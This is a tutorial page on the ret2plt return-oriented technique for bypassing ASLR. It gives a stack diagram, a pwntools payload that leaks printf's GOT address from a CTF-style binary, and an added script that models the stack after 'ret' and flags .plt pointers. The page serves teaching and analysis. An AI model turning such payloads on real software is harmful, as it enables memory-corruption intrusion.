Ret2plt

ASLR bypass

A ret2plt (return-to-PLT) attack is a type of exploitation technique that allows an attacker to execute arbitrary code by redirecting the flow of execution to a function in the Procedure Linkage Table (PLT).

How it works

In a ret2plt attack, the attacker overwrites a function's saved return address, for example through a buffer overflow or a format string exploit, with the address of a function in the PLT. When the function returns, the program jumps to that PLT function instead of to the next instruction in the original code.

The execution of this technique may vary depending on the instruction set architecture and the calling convention used. In this article, the x86 standard calling convention will be used as an example.

```
  address   |   values
------------+-------------------------------------------------------------------
            |   +------------------------- Buffer ---------------------------+
0xffffd264: |   |   0x41414141    0x41414141    0x41414141      0x41414141   |
            |   +------------------------------------------------------------+
            |     +- plt addr -+ +-saved eip -+ +--- param --+               |
0xffffd274: |     | 0x565561dd | | 0xffffd35c | | 0xffffd12c |  0x00000001   |
            |     +------------+ +------------+ +------------+               |
  ...       |    ...
```

To put the stack in this state, the payload must have the following layout:

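[buffer overflow needed length][plt function() address][any 4 bytes][parameter]

```python
from pwn import *

elf = ELF('./chall')

# Placeholder: number of bytes up to the saved return address
# (16 in the diagram above); it must be measured for the actual binary.
padding = 16

payload = flat(
    b'A' * padding,        # fills the buffer up to the saved return address
    elf.plt['printf'],     # overwritten return address: PLT entry of printf()
    elf.symbols['main'],   # return address used by printf() once it finishes
    elf.got['printf']      # first parameter of printf(): its own GOT entry
)
```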

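In this example, the exploit calls printf() with the address of printf()'s own GOT entry as its parameter, and the execution flow then returns to main. Because printf() treats its first argument as a pointer to a string, it prints the bytes stored in that GOT entry, that is, the runtime address of printf() once it has been resolved, up to the first null byte.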
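The stack layout from the diagram, read the way an analyst would read it in a crash dump, as an added example that is not part of the original page: it models what the x86 `ret` and the callee see, and flags stack words that point into `.plt`. The `.plt` bounds and all function names are assumptions made for this sample.

```python
import struct

# Constructed sample: the eight 32-bit words shown in the stack diagram.
STACK_BASE = 0xffffd264
STACK_DUMP = struct.pack(
    "<8I",
    0x41414141, 0x41414141, 0x41414141, 0x41414141,
    0x565561dd, 0xffffd35c, 0xffffd12c, 0x00000001,
)

# Assumed .plt bounds for the sample (hypothetical values); for a real
# binary take them from the section headers, e.g. `readelf -S`.
PLT_START, PLT_END = 0x56556030, 0x56556200


def words(dump, base):
    """Return [(address, value)] for every little-endian 32-bit stack word."""
    values = (v for (v,) in struct.iter_unpack("<I", dump))
    return [(base + 4 * i, v) for i, v in enumerate(values)]


def view_after_ret(dump, base, ret_slot):
    """Model `ret` executed with ESP == ret_slot.

    `ret` pops [ret_slot] into EIP, leaving ESP at ret_slot + 4. With the x86
    stack calling convention the function now running reads [ESP] as its own
    return address and [ESP + 4] as its first parameter.
    """
    mem = dict(words(dump, base))
    return {
        "eip": mem[ret_slot],
        "callee_ret": mem[ret_slot + 4],
        "arg1": mem[ret_slot + 8],
    }


def find_plt_pointers(dump, base, plt_start, plt_end):
    """Heuristic: list stack slots whose value points into .plt.

    A legitimate return address points just after a call instruction, and PLT
    stubs transfer control with jmp, so a .plt value sitting in a return-address
    slot deserves a closer look. Stored function pointers can also match.
    """
    return [addr for addr, v in words(dump, base) if plt_start <= v < plt_end]


if __name__ == "__main__":
    view = view_after_ret(STACK_DUMP, STACK_BASE, 0xffffd274)
    print({k: hex(v) for k, v in view.items()})
    print([hex(a) for a in find_plt_pointers(STACK_DUMP, STACK_BASE, PLT_START, PLT_END)])
```

This is why the payload needs the "any 4 bytes" slot: the word right after the PLT address is consumed as the called function's return address, and only the following word is its first parameter.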
